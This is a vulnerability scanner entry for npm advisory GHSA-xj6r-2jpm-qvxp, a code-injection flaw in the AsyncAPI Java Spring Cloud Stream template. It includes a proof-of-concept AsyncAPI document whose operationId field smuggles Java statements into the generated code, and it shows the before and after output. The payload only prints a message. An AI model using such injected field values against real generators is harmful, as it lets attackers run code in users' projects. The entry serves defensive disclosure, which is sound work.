QID 981503
QID 981503: Nodejs (npm) Security Update for @asyncapi/java-spring-cloud-stream-template (GHSA-xj6r-2jpm-qvxp)
The following was initially reported by @jonaslagoni:
Given the following command:
`ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output`
With the following AsyncAPI document:
```json
{
"asyncapi": "2.0.0",
"info": {
"title": "Streetlight",
"version": "1.0.0"
},
"defaultContentType": "json",
"channels": {
"security/audit/channel": {
"description": "Channel for the turn on command which should turn on the streetlight",
"parameters": {
"streetlight_id": {
"description": "The ID of the streetlight",
"schema": {
"type": "string"
}
}
},
"publish": {
"operationId": "test() { System.out.println("injected"); return test(0); }\n public Consumer<CustomClass> someothername",
"message": {
"name": "TurnonCommand",
"payload": {
"$ref": "#/components/schemas/CustomClass"
}
}
}
}
},
"components": {
"schemas" : {
"CustomClass": {
"type": "object",
"properties": {
"prop": {
"type": "string"
}
}
}
}
}
}
```
Which changes the following output:
```java
...
@Bean
public Consumer<CustomClass> test() {
// Add business logic here.
return null;
}
...
```
To
```java
...
@Bean
public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
public Consumer<CustomClass> someothername() {
// Add business logic here.
return null;
}
...
```
Successful exploitation of this vulnerability may affect the confidentiality, integrity, and availability of the targeted user.
- GHSA-xj6r-2jpm-qvxp -
github.com/advisories/GHSA-xj6r-2jpm-qvxp
CVEs related to QID 981503
| Advisory ID | Software | Component | Link |
|---|---|---|---|
| GHSA-xj6r-2jpm-qvxp | @asyncapi/java-spring-cloud-stream-template |
|